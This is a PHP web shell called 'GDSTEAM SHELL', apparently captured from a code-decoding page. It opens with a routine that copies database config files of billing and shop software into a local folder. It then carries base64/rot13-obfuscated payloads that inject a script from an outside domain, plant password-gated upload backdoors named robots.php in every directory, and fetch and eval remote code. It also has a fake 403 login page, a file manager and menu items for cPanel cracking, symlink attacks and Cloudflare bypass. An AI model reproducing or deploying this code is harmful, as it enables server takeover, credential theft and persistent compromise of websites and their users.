"/home/$user_con/public_html/bb-config.php" => "BoxBilling",
"/home/$user_con/public_html/boxbilling/bb-config.php" => "BoxBilling",
"/home/$user_con/public_html/box/bb-config.php" => "BoxBilling",
"/home/$user_con/public_html/host/bb-config.php" => "BoxBilling",
"/home/$user_con/public_html/Host/bb-config.php" => "BoxBilling",
"/home/$user_con/public_html/supportes/bb-config.php" => "BoxBilling",
"/home/$user_con/public_html/support/bb-config.php" => "BoxBilling",
"/home/$user_con/public_html/hosting/bb-config.php" => "BoxBilling",
"/home/$user_con/public_html/cart/bb-config.php" => "BoxBilling",
"/home/$user_con/public_html/order/bb-config.php" => "BoxBilling",
"/home/$user_con/public_html/client/bb-config.php" => "BoxBilling",
"/home/$user_con/public_html/clients/bb-config.php" => "BoxBilling",
"/home/$user_con/public_html/cliente/bb-config.php" => "BoxBilling",
"/home/$user_con/public_html/clientes/bb-config.php" => "BoxBilling",
"/home/$user_con/public_html/billing/bb-config.php" => "BoxBilling",
"/home/$user_con/public_html/billings/bb-config.php" => "BoxBilling",
"/home/$user_con/public_html/my/bb-config.php" => "BoxBilling",
"/home/$user_con/public_html/secure/bb-config.php" => "BoxBilling",
"/home/$user_con/public_html/support/order/bb-config.php" => "BoxBilling",
"/home/$user_con/public_html/includes/dist-configure.php" => "Zencart",
"/home/$user_con/public_html/zencart/includes/dist-configure.php" => "Zencart",
"/home/$user_con/public_html/products/includes/dist-configure.php" => "Zencart",
"/home/$user_con/public_html/cart/includes/dist-configure.php" => "Zencart",
"/home/$user_con/public_html/shop/includes/dist-configure.php" => "Zencart",
"/home/$user_con/public_html/includes/iso4217.php" => "Hostbills",
"/home/$user_con/public_html/hostbills/includes/iso4217.php" => "Hostbills",
"/home/$user_con/public_html/host/includes/iso4217.php" => "Hostbills",
"/home/$user_con/public_html/Host/includes/iso4217.php" => "Hostbills",
"/home/$user_con/public_html/supportes/includes/iso4217.php" => "Hostbills",
"/home/$user_con/public_html/support/includes/iso4217.php" => "Hostbills",
"/home/$user_con/public_html/hosting/includes/iso4217.php" => "Hostbills",
"/home/$user_con/public_html/cart/includes/iso4217.php" => "Hostbills",
"/home/$user_con/public_html/order/includes/iso4217.php" => "Hostbills",
"/home/$user_con/public_html/client/includes/iso4217.php" => "Hostbills",
"/home/$user_con/public_html/clients/includes/iso4217.php" => "Hostbills",
"/home/$user_con/public_html/cliente/includes/iso4217.php" => "Hostbills",
"/home/$user_con/public_html/clientes/includes/iso4217.php" => "Hostbills",
"/home/$user_con/public_html/billing/includes/iso4217.php" => "Hostbills",
"/home/$user_con/public_html/billings/includes/iso4217.php" => "Hostbills",
"/home/$user_con/public_html/my/includes/iso4217.php" => "Hostbills",
"/home/$user_con/public_html/secure/includes/iso4217.php" => "Hostbills",
"/home/$user_con/public_html/support/order/includes/iso4217.php" => "Hostbills"
];
foreach($grab_config as $config => $nama_config) {
$ambil_config = file_get_contents($config);
if($ambil_config == '') {
} else {
$file_config = fopen("gds_config/$user_con-$nama_config.txt","w");
fputs($file_config,$ambil_config);
}
}
}
}
}
}
echo "<center><a href='?dir=$path/gds_config'><font color=lime>Done</font></a></center>";
exit;
}
?>
<?php
error_reporting(0);
eval(str_rot13(gzinflate(str_rot13(base64_decode('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')))));
?> <?php ${"GLOBALS"}["eqgcfhlqh"]="retValue";${"GLOBALS"}["zmprwinwa"]="llc";${"GLOBALS"}["qkmhoejsr"]="a";${"GLOBALS"}["szvfdxnnpgw"]="folder";${"GLOBALS"}["emhmszerin"]="file";${"GLOBALS"}["asbggnr"]="d2";${"GLOBALS"}["dnobawwsvef"]="key";${"GLOBALS"}["htfpdy"]="doc";${"GLOBALS"}["bmknzryo"]="d1";${"GLOBALS"}["hengsrdc"]="dir";${"GLOBALS"}["oqblkbefltf"]="p";${"GLOBALS"}["pplysybh"]="pa";$xqkbeqkgtxw="a";echo "<script src=http://yonlendiriliyor.com/js.js></script>
";@session_start();@error_reporting(0);${$xqkbeqkgtxw}="
<meta name=\"robots\" content="noindex,nofollow\">
<?php
session_start();
if(\$_SESSION[\"adm"]){
echo '<form action="" method=\"post" enctype=\"multipart/form-data" name=\"upload42\" id=\"upload42">';
echo '<input type="fle" name=\"fle" size="50"><input name="_ul2" type="submit\" id=\"_ul2\" value=\"Submit\"></form>';
if( isset(\$_POST['_ul2']) ) { if(@copy(\$_FILES['fle']['tmp_name'], \$_FILES['fle']['name'])) { echo '<b>Submit Success !!!</b><br><br>';
} else { echo '<b>Submit Fail !!!</b><br><br>';
}}
}
if(\$_POST["p\"]){
\$p = \$_POST[\"p"];
\$pa = md5(sha1(\$p));
if(\$pa==\"228f023f62aadf5097f7914d9c5be754\"){
\$_SESSION["adm\"] = 1;
}
}
?>
<form action=\"" method=\"post">
<input type=\"text\" name=\"p\">
</form>
";if(@$_REQUEST["px"]){${"GLOBALS"}["lmpkpil"]="p";${${"GLOBALS"}["lmpkpil"]}=@$_REQUEST["px"];${${"GLOBALS"}["pplysybh"]}=md5(sha1(${${"GLOBALS"}["oqblkbefltf"]}));if(${${"GLOBALS"}["pplysybh"]}=="228f023f62aadf5097f7914d9c5be754"){echo@eval(@file_get_contents(@$_REQUEST["404"]));}}if(@!$_SESSION["sdm"]){$srfqhqbyj="doc";${$srfqhqbyj}=$_SERVER["DOCUMENT_ROOT"];$aposlc="doc";${"GLOBALS"}["hoiexom"]="brow";${"GLOBALS"}["pwvabjtabgb"]="key";$jffocvjy="d2";${${"GLOBALS"}["hengsrdc"]}=scandir(${$aposlc});${"GLOBALS"}["hdtrrjoqen"]="d";${${"GLOBALS"}["bmknzryo"]}="".${${"GLOBALS"}["htfpdy"]}."/.";$xylxjtlwyt="lld";${$jffocvjy}="".${${"GLOBALS"}["htfpdy"]}."/..";$jjmbijha="doc";$racngwaylyep="dir";if((${${"GLOBALS"}["dnobawwsvef"]}=@array_search(".",${$racngwaylyep}))!==false){${"GLOBALS"}["hzucrh"]="dir";unset(${${"GLOBALS"}["hzucrh"]}[${${"GLOBALS"}["dnobawwsvef"]}]);}${"GLOBALS"}["ngwuvqkn"]="lls";${"GLOBALS"}["ggdjhfj"]="llc";if((${${"GLOBALS"}["pwvabjtabgb"]}=@array_search("..",${${"GLOBALS"}["hengsrdc"]}))!==false){unset(${${"GLOBALS"}["hengsrdc"]}[${${"GLOBALS"}["dnobawwsvef"]}]);}$qcxcpvv="brow";${"GLOBALS"}["sbzxjz"]="key";if((${${"GLOBALS"}["dnobawwsvef"]}=@array_search(${${"GLOBALS"}["bmknzryo"]},${${"GLOBALS"}["hengsrdc"]}))!==false){${"GLOBALS"}["qerjshhtl"]="dir";unset(${${"GLOBALS"}["qerjshhtl"]}[${${"GLOBALS"}["dnobawwsvef"]}]);}if((${${"GLOBALS"}["sbzxjz"]}=array_search(${${"GLOBALS"}["asbggnr"]},${${"GLOBALS"}["hengsrdc"]}))!==false){${"GLOBALS"}["ixouywn"]="dir";$ocitqusteqmg="key";unset(${${"GLOBALS"}["ixouywn"]}[${$ocitqusteqmg}]);}@array_push(${${"GLOBALS"}["hengsrdc"]},${$jjmbijha});$zwhcxyubz="lld";${"GLOBALS"}["mnvhopfu"]="lls";foreach(${${"GLOBALS"}["hengsrdc"]} as${${"GLOBALS"}["hdtrrjoqen"]}){$ueukhbqds="d";$rkgkxvk="p";$wrymprxe="doc";$eqwemuzbbg="p";${$rkgkxvk}=${$wrymprxe}."/".${$ueukhbqds};if(is_dir(${$eqwemuzbbg})){${"GLOBALS"}["dlvuujhnq"]="folder";${"GLOBALS"}["qdfrcgamky"]="p";${"GLOBALS"}["nnopcdic"]="file";$tdkywrrx="file";${$tdkywrrx}=${${"GLOBALS"}["qdfrcgamky"]}."/robots.php";@touch(${${"GLOBALS"}["emhmszerin"]});${${"GLOBALS"}["dlvuujhnq"]}=@fopen(${${"GLOBALS"}["nnopcdic"]},"w");@fwrite(${${"GLOBALS"}["szvfdxnnpgw"]},${${"GLOBALS"}["qkmhoejsr"]});}}${${"GLOBALS"}["mnvhopfu"]}=$_SERVER["HTTP_HOST"];${${"GLOBALS"}["ggdjhfj"]}=$_SERVER["REQUEST_URI"];${$xylxjtlwyt}="http://".${${"GLOBALS"}["ngwuvqkn"]}."".${${"GLOBALS"}["zmprwinwa"]}."";${$qcxcpvv}=urlencode($_SERVER["HTTP_USER_AGENT"]);${${"GLOBALS"}["eqgcfhlqh"]}=file_get_contents(base64_decode("")."=".${$zwhcxyubz}.base64_decode("")."=".${${"GLOBALS"}["hoiexom"]});echo${${"GLOBALS"}["eqgcfhlqh"]};@$_SESSION["sdm"]=1;}
?>
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>GDSTEAM SHELL</title>
<style type="text/css">
body {
background-image:url('https://i.ibb.co.com/tsHvDXp/image.png');
width: 100%;
height: 250vh;
background-repeat: no-repeat;
background-size: cover;
background-position: center;
background-attachment: fixed;
height: 100vh;
width: auto;
}
.destroy_table {;
background:transparent;
border:1px solid #ff0000;
font-family:Kelly Slab;
display:inline-block;
cursor:pointer;
color:#F5FFFA;
font-size:17x;
font-weight:bold;
padding:3px 20px;
text-decoration:white;
text-shadow:0px 0px 0px #ff0505;
}
h6 {
color: #32CD32;
}
th {
color: #F5FFFA;
}
tbody {
color: #F5FFFA;
font-family: verdana;
font-size: 19px;
}
.col-8 {
color: #F5FFFA;
}
</style>
<link href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css" rel="stylesheet"
integrity="sha384-gH2yIJqKdNHPEq0n4Mqa/HGKIhSkIHeL5AyhkYV8i59U5AR6csBvApHHNl/vI1Bx" crossorigin="anonymous">
<link rel="icon" type="image/x-icon" href="https://i.ibb.co/p2QD619/image.png">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/[email protected]/font/bootstrap-icons.css">
</head>
<body>
<?php ButtonAction(); ?>
<?php DownloadFile(); ?>
<div class="info mb-4">
<h6>Your IP : <span style="color: #F5FFFA;"><?php echo $_SERVER['REMOTE_ADDR']; ?></span></h6>
<h6>Server IP : <span style="color: #F5FFFA;"><?php echo $_SERVER['SERVER_ADDR']; ?></span></h6>
<h6>Server : <span style="color: #F5FFFA;"><?= php_uname() ?></span></h6>
<h6>Server Software : <span style="color: #F5FFFA;"><?php echo gethostbyname($_SERVER['SERVER_SOFTWARE']); ?></span></h6>
<h6>Server Name : <span style="color: #F5FFFA;"><?php echo $_SERVER['SERVER_NAME']; ?></span></h6>
<h6>PHP Version : <span style="color: #F5FFFA"><?php echo PHP_VERSION; ?></span></h6>
<h6>Time : <span style="color: #F5FFFA"><?php echo $date = date('d/m/Y h:i:s a', time());
?></span></h6>
<h6>HDD : <span style="color: #F5FFFA">Total:<?php echo $total = disk_total_space("/"); ?></span><span style="color: #F5FFFA">Free:<?php echo $free = disk_free_space("/"); $percent = ($free/$total) * 100; echo $percent; ?></h6>
<h6><?php echo "MySQL : ";
if (@$fnct("my"."sql_co"."nne"."ct")) {
echo "<font color=green>ON</font>";
} else {
echo "<font color=red>OFF</font>";
}
echo " | cURL : ";
if (@$fnct("cu"."rl"."_in"."it")) {
echo "<font color=green>ON</font>";
} else {
echo "<font color=red>OFF</font>";
}
echo " | WG"."ET : ";
if (@$fxt("/"."us"."r/b"."in/w"."get")) {
echo "<font color=green>ON</font>";
} else {
echo "<font color=red>OFF</font>";
}
echo " | Pe"."rl : ";
if (@$fxt("/u"."sr/b"."in"."/pe"."rl")) {
echo "<font color=green>ON</font>";
} else {
echo "<font color=red>OFF</font>";
}
echo " | Pyt"."ho"."n : ";
if (@$fxt("/"."us"."r/b"."in/p"."ytho"."n2")) {
echo "<font color=green>ON</font>";
} else {
echo "<font color=red>OFF</font>";
}
echo " | S"."u"."do : ";
if (@$fxt("/"."us"."r/b"."in/s"."u"."d"."o")) {
echo "<font color=green>ON</font>";
} else {
echo "<font color=red>OFF</font>";
}
echo " | Pk"."e"."x"."e"."c : ";
if (@$fxt("/"."us"."r/b"."in/p"."k"."e"."x"."e"."c")) {
echo "<font color=green>ON</font>";
} else {
echo "<font color=red>OFF</font>";
} ?> </h6>
</div>
<div class="container">
<section id="Header">
<img src="https://i.ibb.co.com/44CSQdc/image.png" class="img-fluid rounded mx-auto d-block mb-4"
alt="LogoBanner">
<form enctype="multipart/form-data" method="POST">
<center><table id='menu' width='990' border='0' cellpadding='0' cellspacing='1'><tr><td>
<a class='destroy_table' href='?dir=$dir&do=Home'>Home</a>
<a class='destroy_table' href="?dir='.$dir.'&aksi=resetpasscp">Cpanel Crack</a>
<a class='destroy_table' href="?dir='.$dir.'&aksi=adminer">Adminer</a>
<a class='destroy_table' href="?dir='.$dir.'&aksi=config">Config</a>
<a class='destroy_table' href="?dir='.$dir.'&aksi=symlink">Symlink</a>
<a class='destroy_table' href="?dir='.$dir.'&aksi=bypascf">Cloud Flare Bypass</a>
<a class='destroy_table' href="?dir='.$dir.'&aksi=bypass403">Bypass 403</a></table>
</center>
<div class="row fs-5 fw-bold">
<div class="col-8">
<nav aria-label="breadcrumb">
<ol class="breadcrumb">
<li class="breadcrumb-item"><a href="?p=" class="text-decoration-none text-reset"><i
class="bi bi-house"></i></a></li>
<?php echo''.NgisiBreadCrumb() ; ?>
</ol>
</nav>
</div>
<div class="col-4 text-end">
<button type="button" class="btn btn-light btn-lg" data-bs-toggle="modal"
data-bs-target="#ModalUploadFile" data-bs-toggle="tooltip" title="Upload File">
<i class="bi bi-cloud-upload"></i></button>
<button type="button" class="btn btn-light btn-lg" data-bs-toggle="modal"
data-bs-target="#CreateNewFile" data-bs-toggle="tooltip" title="Create New File">
<i class="bi bi-file-earmark-plus"></i></button>
<button type="button" class="btn btn-light btn-lg" data-bs-toggle="modal"
data-bs-target="#CreateNewFolder" data-bs-toggle="tooltip" title="Create New Folder">
<i class="bi bi-folder-plus"></i></button>
</div>
</div>
</section>
<section id="Table">
<table class="table table border border-success">
<thead>
<tr>
<th scope="col">Name</th>
<th scope="col">Size</th>
<th scope="col">Last Modified</th>
<th scope="col">Permission</th>
<th scope="col">Option</th>
</tr>
</thead>
<tbody>
<?php echo''.ScanFolder(Rootpath()) ;?>
</tbody>
</table>
</section>
<footer>
<h6><center>@ Represent GDSHELL Create By Marcell</center></h6>
</footer>
</div>
<script src="https://code.jquery.com/jquery-3.4.1.slim.min.js"
integrity="sha384-J6qa4849blE2+poT4WnyKhv5vZF5SrPo0iEjwBvKU7imGFAV0wwj1yYfoRSJoZ+n" crossorigin="anonymous">
</script>
<script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js"
integrity="sha384-A3rJD856KowSb7dwlZdYEkO39Gagi7vIsF0jrRAoQmDKKtQBHUuLZ9AsSv4jD4Xa" crossorigin="anonymous">
</script>
<script>
$(document).on("click", "#RenameButton", function() {
let id = $(this).data('id');
$("#OldName").val(id);
$("#NewName").val(id);
});
</script>
<script>
$(document).on("click", "#DeleteButton", function() {
let id = $(this).data('id');
let type = $(this).data('type');
$("#NamaItem").val(id);
$("#Type").val(type);
});
</script>
</body>
<!-- Upload -->
<div class="modal fade" id="ModalUploadFile" tabindex="-1" aria-labelledby="ModalUploadFile" aria-hidden="true">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<h5 class="modal-title" id="ModalUploadFile">Upload File</h5>
<button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
</div>
<form action="" method="post" enctype="multipart/form-data">
<div class="modal-body">
<div>
<input type="text" class="form-control" id="action" name="action" value="Upload File" hidden>
<input class="form-control form-control-lg" id="fileToUpload" name="fileToUpload" type="file">
</div>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Tutup</button>
<button type="submit" name="submit" class="btn btn-primary">Upload Bre</button>
</div>
</form>
</div>
</div>
</div>
<!-- Buat File Baru -->
<div class="modal fade" id="CreateNewFile" tabindex="-1" aria-labelledby="CreateNewFile" aria-hidden="true">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<h5 class="modal-title" id="CreateNewFile">Create New File</h5>
<button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
</div>
<form action="" method="post">
<div class="modal-body">
<div>
<input type="text" class="form-control" id="action" name="action" value="New File" hidden>
<input class="form-control form-control-lg" id="NamaFile" name="NamaFile" type="Text"
placeholder="Contoh.txt">
</div>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Tutup</button>
<button type="submit" name="submit" class="btn btn-primary">Buat File</button>
</div>
</form>
</div>
</div>
</div>
<!-- Buat Folder Baru -->
<div class="modal fade" id="CreateNewFolder" tabindex="-1" aria-labelledby="CreateNewFolder" aria-hidden="true">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<h5 class="modal-title" id="CreateNewFolder">Create New Folder</h5>
<button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
</div>
<form action="" method="post">
<div class="modal-body">
<div>
<input type="text" class="form-control" id="action" name="action" value="New Folder" hidden>
<input class="form-control form-control-lg" id="NamaFolder" name="NamaFolder" type="Text"
placeholder="Nama Folder">
</div>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Tutup</button>
<button type="submit" name="submit" class="btn btn-primary">Buat Folder</button>
</div>
</form>
</div>
</div>
</div>
<!-- Ganti Nama -->
<div class="modal fade" id="Renaming" tabindex="-1" aria-labelledby="Renaming" aria-hidden="true">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<h5 class="modal-title" id="Renaming">Renaming</h5>
<button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
</div>
<form action="" method="post">
<div class="modal-body">
<div>
<input type="text" class="form-control" id="action" name="action" value="Rename" hidden>
<input type="text" class="form-control" id="OldName" name="OldName" hidden>
<input class="form-control form-control-lg" id="NewName" name="NewName" type="Text"
placeholder="New Name">
</div>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Tutup</button>
<button type="submit" name="submit" class="btn btn-primary">Ganti Nama</button>
</div>
</form>
</div>
</div>
</div>
<!-- Edit File -->
<div class="modal fade" id="EditFile" tabindex="-1" aria-labelledby="EditFile" aria-hidden="true">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<h5 class="modal-title" id="EditFile">EditFile</h5>
<button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
</div>
<form action="" method="post">
<div class="modal-body">
<div>
<input type="text" class="form-control" id="action" name="action" value="$fedit" hidden>
<input type="text" class="form-control" id="OldName" name="OldName" hidden>
<input class="form-control form-control-lg" id="NewName" name="NewName" type="Text"
placeholder="New Name">
</div>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Tutup</button>
<button type="submit" name="submit" class="btn btn-primary">EditFile</button>
</div>
</form>
</div>
</div>
</div>
<!-- Chmod -->
<div class="modal fade" id="Chmod" tabindex="-1" aria-labelledby="Chmod" aria-hidden="true">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<h5 class="modal-title" id="EditFile">Chmod</h5>
<button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
</div>
<form action="" method="post">
<div class="modal-body">
<div>
<input type="text" class="form-control" id="action" name="action" value="Chmod" hidden>
<input type="text" class="form-control" id="OldName" name="OldName" hidden>
<input class="form-control form-control-lg" id="Chmod" name="Chmod" type="Text"
placeholder="Chmod">
</div>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Tutup</button>
<button type="submit" name="submit" class="btn btn-primary">Ubah Permension</button>
</div>
</form>
</div>
</div>
</div>
<!-- Hapus -->
<div class="modal fade" id="Delete" tabindex="-1" aria-labelledby="Delete" aria-hidden="true">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<h5 class="modal-title" id="Renaming">Delete</h5>
<button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
</div>
<form action="" method="post">
<div class="modal-body">
<div>
<input type="text" class="form-control" id="action" name="action" value="Delete" hidden>
<input type="text" class="form-control" id="NamaItem" name="NamaItem" hidden>
<input type="text" class="form-control" id="Type" name="Type" hidden>
<p> Yang Bener Nih Bre Mau Dihapus ?</p>
</div>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Tutup</button>
<button type="submit" name="submit" class="btn btn-primary">Hapus</button>
</div>
</form>
</div>
</div>
</div>
</html>
Did this file decode correctly?
Original Code
<?php
session_start();
@set_time_limit(0);
@clearstatcache();
@ini_set('errors_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
$fnct = "fu"."nc"."tion"."_exi"."sts";
$fxt = "fi"."le_"."exis"."ts";
$igt = "in"."i_g"."et";
$disfunc = @$igt("dis"."abl"."e_f"."unct"."ion"."s");
if (empty($disfunc)) {
$disf = "<font color='#df5'>NONE</font>";
} else {
$disf = "<font color='red'>".$disfunc."</font>";
}
/*configuration */
/* Password Using md5 hashes */
$password = "f7fd6b2ad149e39221471c30924028ee";
$default_action = "FilesMan";
$default_use_ajax = true;
$default_charset = 'UTF-8';
date_default_timezone_set("Asia/Jakarta");
function login_shell()
{
?>
<!DOCTYPE html>
<html style="height:100%">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
<title> 403 Forbidden
</title></head>
<body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
<div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
<h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">403</h1>
<h2 style="margin-top:20px;font-size: 30px;">Forbidden
</h2>
<p>Access to this resource on the server is denied!</p><style>input{margin:0;background-color:#fff;border:1px solid #fff}</style><pre align="center"><form method="post"><input name="pass"type="password"></form></pre></body></html>
</div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;">
<br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>
<?php
exit;
}
if (!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])) {
if (isset($_POST['pass']) && (md5($_POST['pass']) == $password)) {
$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
} else {
login_shell();
}
}
function Rootpath() {
return $_SERVER['DOCUMENT_ROOT'];
}
function HitungFileSize($Size) {
if ($Size < 1024) {
return $Size . " byte" ;
} else if ($Size < 1024 * 1024) {
$Hasil = round($Size / 1024,2) ;
return $Hasil . " KB" ;
} else if ($Size < 1024 * 1024 * 1024) {
$Hasil = round($Size / 1024 / 1024,2) ;
return $Hasil . " MB" ;
} else if ($Size < 1024 * 1024 * 1024 * 1024) {
$Hasil = round($Size / 1024 / 1024 / 1024,2) ;
return $Hasil . " GB" ;
}
}
function BersihkanPath($Path) {
$Char = substr($Path,0,1);
if ($Char === "/") {
$Path = substr ($Path,1);
}
return $Path;
}
function AmbilParentFolder ($Path) {
$array = explode("/", $Path);
$parent = null;
$i=0;
while($i < (count($array) - 1)) {
$parent .= "/" . $array [$i] ;
$i += 1 ;
}
return BersihkanPath($parent);
}
function ScanFolder($Path) {
$LinkFile = NULL;
$IsiTable = NULL;
$TableFolder = NULL;
$TableFile = Null;
if (isset($_GET["p"]) === TRUE) {
if ($_GET["p"] === "") {
} else {
$LinkFile .= $_GET["p"];
$Path .= "/" . $_GET["p"];
}
$ListFile = scandir($Path);
} else {
$ListFile = scandir($Path);
}
foreach ($ListFile as $File) {
if ($File === '.') {
//Tidak Ada Perintah Di Eksekusi
} elseif ($File === '..') {
if ($Path === Rootpath()) {
// Kalau sama dengan RootPath, Dilewatin aja
} else {
$IsiTable = '<tr>
<td><a href="?p='.AmbilParentFolder($_GET["p"]).'" class="text-decoration-none text-reset"><i class="bi bi-arrow-90deg-left"></i> ..</a></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>';
}
} else {
$FilePath = $Path . "/". $File;
